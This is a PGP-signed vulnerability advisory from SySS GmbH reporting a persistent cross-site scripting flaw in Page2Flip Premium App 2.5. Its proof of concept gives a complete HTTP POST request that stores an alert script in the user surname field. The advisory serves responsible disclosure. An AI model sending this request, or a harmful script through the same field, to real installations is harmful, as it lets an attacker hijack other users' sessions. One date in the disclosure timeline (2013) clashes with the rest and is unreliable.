Page2Flip 2.5 Cross Site Scripting

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2015-028  
Product: Page2Flip  
Vendor: w!ssenswerft GmbH  
Affected Version(s): Premium App 2.5, probably also in Business App   
and Basic App, and in lower versions  
Tested Version(s): Premium App 2.5  
Vulnerability Type: Cross-Site Scripting (CWE-79)   
Risk Level: High  
Solution Status: Open  
Vendor Notification: 2015-06-29  
Solution Date:   
Public Disclosure:   
CVE Reference: Not yet assigned  
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
With the Page2Flip Web application, it is possible to create e-papers in  
PDF format that can be flicked through digitally. Such e-papers can be  
used for magazines, catalogues, flyers, etc. (see [1]).  
  
The Page2Flip application is vulnerable to Persistent Cross-Site  
Scripting so that administrative users can attack other administrative  
users or users with fewer privileges.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The SySS GmbH identified a persistent cross-site scripting vulnerability  
in the Page2Flip Premium App.   
  
At least the parameters "first name" and "last name" are not sanitized  
sufficiently resulting in a persistent cross-site scripting  
vulnerability.   
  
This reflected cross-site scripting vulnerability can be exploited in  
the context of an authenticated user by storing script code in one of  
these fields.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following HTTP POST request using the JavaScript code   
"<script>alert(1)</script>" as the value for the parameter "nachname"  
demonstrates the persistent cross-site scripting vulnerability by  
showing a JavaScript alert box as soon as this user has logged on:  
  
POST /settings/users HTTP/1.1  
Host: <host>  
Content-Type: application/x-www-form-urlencoded;charset=UTF-8  
Content-Length: 1239  
Cookie: <cookies>  
  
accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.ev  
ent.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2015-06-23: Vulnerability discovered  
2013-06-29: Vulnerability reported to vendor  
2015-07-07: Reported vulnerabilities again as the vendor did not respond   
to the first e-mail  
2015-07-14: Reminder sent concerning reported vulnerabilities  
2015-08-24: Public release of security advisory according to the SySS  
Responsible Disclosure Policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Page2Flip homepage  
http://page2flip.de/  
[2] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Dr. Erlijn van Genuchten of the  
SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc  
Key ID: 0xBD96FF2A  
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJV2x3sAAoJEAylhje9lv8qTP8QAK2z/18lni4UnWo3RElmM+/c  
CiaqysnydDIvREm2Px36HQjeUDrYA35pZZhxi742E/flMhGw2/aH1gdVtmB6K7ai  
qnIvStXOIMVul7IGhuHsOn+W7k7IfRx4726VGVoWNyUFoLmn5azU6/OqY+2ql6fH  
rh/RfdKt8Lp2Q0KSdZy7Le3Il7hJX7YRoD8O/uECI7U2MtVwWJQg/zfK1y9+zFpP  
Z7v55GMWRDZ4UWin6Fgps3ayVqdnmwUOo0R8xIkn9HU5j7S89QT+nRBE46FLO4ED  
ZidsWxTeoUS75COcWsuCWVJXsse4KpdDSBVfIPoRG9OUU5s081OuDXHApZGYVlZb  
lHlmVwjtyIGXUe5vecdCzjY4rk+C3nWwnr9Tew4QNtzg3NdPfugrpNeyBGFeVcu6  
749ojAkzcGbFToEvbYBehBsbnNFq1DbUuLTkib+TCmM36/UZiZRZ9rnVS1T4e7Z3  
r6fSlYVmFT19j4KfyucDvLv1XVsj4AJ77YI51xlRvnDEJkmQd3pvGfixZJ3n0Gse  
eY9l7398jSzMMv+ePZ2eDWFomt23+tNODROy/ST9n15avYi2WlNb3aai86CdGnqZ  
bstvEc7NTVyMotWmfYmbWidqMiCI4toB9ZAUMVlEUKTKMLQp6vUZe8lUiOpjNczE  
0vOmqRgHRAff0wPtjo1I  
=rzEs  
-----END PGP SIGNATURE-----  
`